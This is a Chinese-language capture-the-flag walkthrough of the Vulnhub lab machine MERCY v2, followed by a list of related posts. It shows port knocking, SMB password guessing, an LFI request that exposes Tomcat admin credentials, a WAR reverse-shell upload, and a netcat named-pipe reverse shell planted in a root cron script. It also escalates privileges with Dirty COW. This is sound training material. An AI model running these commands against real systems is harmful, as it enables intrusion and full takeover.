vulnhub - digitalworld.local: MERCY v2 (考点:信息搜集 smb 端口敲门 RIPS tomcat linux 提权)
https://www.vulnhub.com/entry/digitalworldlocal-mercy-v2,263/
nat网络
arp-scan -l 比平常多出来的ip就是靶机了
nmap
PORT STATE SERVICE REASON VERSION
22/tcp filtered ssh port-unreach ttl 64
53/tcp open domain syn-ack ttl 64 ISC BIND 9.9.5-3ubuntu0.17 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.9.5-3ubuntu0.17-Ubuntu
80/tcp filtered http port-unreach ttl 64
110/tcp open pop3 syn-ack ttl 64
| fingerprint-strings:
| DistCCD, JavaRMI, LANDesk-RC, NCP, NotesRPC, Radmin, Socks4, TerminalServer, WMSRequest, beast2, ibm-db2-das, ms-sql-s, mydoom, oracle-tns:
| +OK Dovecot (Ubuntu) ready.
| HELP4STOMP, OfficeScan:
| +OK Dovecot (Ubuntu) ready.
| -ERR Unknown command.
| -ERR Unknown command.
| Memcache, NessusTPv10, NessusTPv11, NessusTPv12, Verifier, VerifierAdvanced, WWWOFFLEctrlstat, firebird:
| +OK Dovecot (Ubuntu) ready.
| -ERR Unknown command.
| Socks5:
| +OK Dovecot (Ubuntu) ready.
| -ERR Unknown command.
| -ERR Unknown command.
|_ -ERR Unknown command.
|_pop3-capabilities: AUTH-RESP-CODE UIDL SASL RESP-CODES CAPA TOP STLS PIPELINING
|_ssl-date: TLS randomness does not represent time
139/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap syn-ack ttl 64 Dovecot imapd
|_imap-capabilities: listed more have Pre-login LOGIN-REFERRALS post-login STARTTLS IDLE LITERAL+ capabilities SASL-IR ENABLE ID IMAP4rev1 OK LOGINDISABLEDA0001
|_ssl-date: TLS randomness does not represent time
445/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
993/tcp open ssl/imaps? syn-ack ttl 64
|_ssl-date: TLS randomness does not represent time
995/tcp open ssl/pop3s? syn-ack ttl 64
|_ssl-date: TLS randomness does not represent time
8080/tcp open http syn-ack ttl 64 Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
| Supported Methods: GET HEAD POST PUT DELETE OPTIONS
|_ Potentially risky methods: PUT DELETE
|_http-open-proxy: Proxy might be redirecting requests
| http-robots.txt: 1 disallowed entry
|_/tryharder/tryharder
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
扫出很多端口
看到53要想到dns加地址,但是试了试这台靶机无效
22和80一个是ssh登录,一个是网页搜集信息。但都是filter状态, 要想到会不会有端口敲门的考点存在,参考Dc9这台靶机
8080是打开了的http web,这是 tomcat,tomcat的渗透方法参考hackthebox这台靶机Jerry,nmap提示了8080下有新的路径tryharder。
进去看是base64,解码后出来一大段提示。意思是里面设的密码很弱。还有一个密码甚至就是password。
于是我用jerry靶机的思路猜密码,破解等,但都没用。。
信息搜集还不够,也可以用别的工具继续搜集信息,比如autorecon 这里
看到139 445端口开了要想到smb利用
autorecon扫到smb的用户信息qiu,等
也可以
smbclient --list 192.168.189.201 -U ""
看到有个qiu
Sharename Type Comment--------- ---- -------print$ Disk Printer Driversqiu Disk IPC$ IPC IPC Service (MERCY server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.Server Comment--------- -------Workgroup Master--------- -------WORKGROUP
这里也是个难点。试了几次,想到之前提示的密码password可以用在这里
smbclient -U "qiu" //192.168.189.201/qiu
在.private
opensesame
config
里最终搜到了端口敲门信息
[options]UseSyslog[openHTTP]sequence = 159,27391,4seq_timeout = 100command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 80 -j ACCEPTtcpflags = syn[closeHTTP]sequence = 4,27391,159seq_timeout = 100command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 80 -j ACCEPTtcpflags = syn[openSSH]sequence = 17301,28504,9999seq_timeout = 100command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPTtcpflags = syn[closeSSH]sequence = 9999,28504,17301seq_timeout = 100
敲开
for x in 159 27391 4; do nmap -Pn --max-retries 0 -p $x 192.168.189.201; done
for x in 17301 28504 9999; do nmap -Pn --max-retries 0 -p $x 192.168.189.201; done
这下80打开了,进去看看。dirbuster扫路径。看到robot.txt又提示了俩新路径,mercy没啥,nomercy进去后是rips界面,写了版本
直接搜漏洞
C:\root> searchsploit rips 0.53
---------------------------------------------------------------------------------------------------------- ----------------------------------------Exploit Title | Path| (/usr/share/exploitdb/)
---------------------------------------------------------------------------------------------------------- ----------------------------------------
RIPS 0.53 - Multiple Local File Inclusions | exploits/php/webapps/18660.txt
---------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
说是有漏洞LFI文件包含。试了试果然有经典的/etc/passwd
再想想还可以看什么LFI的路径
此处又回到我们之前对8080 tom猫的测试。之前我搞不出来它的密码
但是之前的8080页面右下角提示了tomcat管理员信息的目录
拿这个目录试试LFI
http://192.168.189.201/nomercy//windows/code.php?file=../../../../../../etc/tomcat7/tomcat-users.xml
得到了管理员和用户的两个账号信息。上面是管理员,后面写了role,角色是管理员
username="thisisasuperduperlonguser" password="heartbreakisinevitable" roles="admin-gui,manager-gui"/>
username="fluffy" password="freakishfluffybunny" roles="none"/>
然后我继续用jerry的靶机方法,进入管理员界面,造弹shell的war包。上传,拿shell
tty: python -c 'import pty; pty.spawn("/bin/bash")'
拿的是tomcat的shell,但是我们已经知道了另一个用户的信息,所以直接su fluffy, 输入密码
搞定
老套路,linpeas.sh自动扫
看到自己目录下的这个文件竟然是root执行,我还有权修改
那我改成弹shell的命令。。echo加上句话,或nano修改,放到最底下
rm -rf /tmp/p; mknod /tmp/p p; /bin/sh 0</tmp/p | nc 192.168.xxx.xxx 5555 1>/tmp/p
根据代码内容好像是再修改和更新时间,看着像是crontab,隔段时间执行的定时任务,
其实我打算上pspy看下进程或别的方法再看下是不是cron job
不过打开监听后
等了一会就收到。。搞定。确实是crontab
还有版本提权方法,毕竟用linpeas,一开始就会报4.4.0的亮眼提示。
搜了下可以用脏牛dirtycow,这是个经典提权文件,就用它了。
C:\root> ./linux-exploit-suggester.sh -k 4.4.0Available information:Kernel version: 4.4.0
Architecture: N/A
Distribution: N/A
Distribution version: N/A
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): N/A
Package listing: N/ASearching among:73 kernel space exploits
0 user space exploitsPossible Exploits:[+] [CVE-2017-16995] eBPF_verifierDetails: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.htmlExposure: probableTags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},ubuntu=(16.04|17.04){kernel:4.(8|10).0-(19|28|45)-generic}Download URL: https://www.exploit-db.com/download/45010Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1[+] [CVE-2016-5195] dirtycowDetails: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetailsExposure: probableTags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04Download URL: https://www.exploit-db.com/download/40611
但是考过去,靶机却说没有安装gcc
只有本机先编译了。但是我的kali2020是64位。靶机是32位。执行不了。 我怕编32位会有莫名其妙错误,保险起见最好还是用32位机编译,我的kali2018 32位虚拟机还在,我在那里面编译的,虽然报错,但是不影响。。
我从这里下载的这个脏牛,用的32位,根据提示编译
然后把编译好的拷到靶机。
成功
vulnhub - digitalworld.local: MERCY v2 (考点:信息搜集 smb 端口敲门 RIPS tomcat linux 提权)相关推荐
- Vulnhub:Digitalworld.local (Mercy v2)靶机
kali:192.168.111.111 靶机:192.168.111.130 信息收集 端口扫描 nmap -A -v -sV -T5 -p- --script=http-enum 192.168. ...
- OSCP练习:vulhub靶机DIGITALWORLD.LOCAL: MERCY v2
nmap扫下端口 nmap -sS -sV 192.168.8.144 发现22.80是关的,应该需要敲门 8080是tomcat页面,但是manager没密码控制台进不去, 提示主机管理器 Web ...
- 【甄选靶场】Vulnhub百个项目渗透——项目三:Raven-2(服务利用,udf提权)
Vulnhub百个项目渗透 Vulnhub百个项目渗透--项目三:Raven-2(服务利用,udf提权)
- hackthebox- kotarak(考点:信息搜集隐藏端口 tom 上传 域文件解析 wget-gnu 1.16提权 )
1扫描搜集 普通nmap -A 扫.8009打不开,8080是汤姆猫,但是没密码. 没有多少价值信息,很可能端口扫描不全,于是速度版全端口再扫 masscan -p1-65535,U:1-65535 ...
- Vulnhub:Digitalworld.local (Development)靶机
kali:192.168.111.111 靶机:192.168.111.130 信息收集 端口扫描 nmap -A -v -sV -T5 -p- --script=http-enum 192.168. ...
- linux80瑞口提权口今,史上最全Linux提权后获取敏感信息方法
在本文开始之前,我想指出我不是专家.据我所知,在这个庞大的区域,没有一个"神奇"的答案.分享,共享(我的出发点).下面是一个混合的命令做同样的事情,在不同的地方,或只是一个不同的眼 ...
- vulnhub渗透系列之DC(一) :内含suid的三种提权方法
我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习. 实验过程总结 1.这个题我觉得对刚入门的我来说,十分的困难 ...
- digitalworld.local: MERCY靶机入侵
0x01 前言 MERCY是一个致力于PWK课程安全的靶机系统.MERCY是一款游戏名称,与易受攻击的靶机名称无关.本次实验是攻击目标靶机获取root权限并读系统目录中的proof.txt信息 靶机的 ...
- Hackthebox-Bart(考点:信息搜集/密码猜解/user-agent注入/window账号利用)
1. nmap搞起 2.信息搜集&密码猜解 显示forum.bart.htb,把bart和forum.bart都加到/etc/host 里去: 10.10.10.81 forum.bart.h ...
最新文章
- 深入理解JVM(二)--垃圾收集算法
- iOS ERROR ITMS - 打包上传报错整理
- 【Android 逆向】Android 进程注入工具开发 ( EIP 寄存器指向 dlopen 函数 | ESP 寄存器指向栈内存 | 调试程序收回目标进程控制权 )
- 解决Win8.1系统LYNC共享PPT提示“演示文稿遇到问题”
- 升级到win10,安装visualstudio ,80端口被系统服务占用的解决
- SQL Server 2008空间数据应用系列四:基础空间对象与函数应用
- 如何open一个新tab页面
- SQL Server 2008R2数据库文件导入到SQL Server 2008数据库中
- 101 200 之间的素数
- 骗分技巧————《OI骗分导论》
- 治近视的秘方!1000度近视降到只有200度,不知道有没有用,试试(转)
- 自动化测试工具 Selenium WebDriver 入门教程
- Excel行高列宽使用单位为磅(1cm=28.6磅)
- 华为设备配置IS-IS的负载分担
- 混合颜色的色值计算公式
- 【教程】ESP32连接华为云IoT平台
- 思想者:漫谈大学生的四个LEARN
- 小学总结计算机,小学计算机教师年度工作总结
- 征战FPGA之使用clk_wiz的IP核获取任意频率时钟
- 26.纯 CSS创作按钮被从纸上掀起的立体效果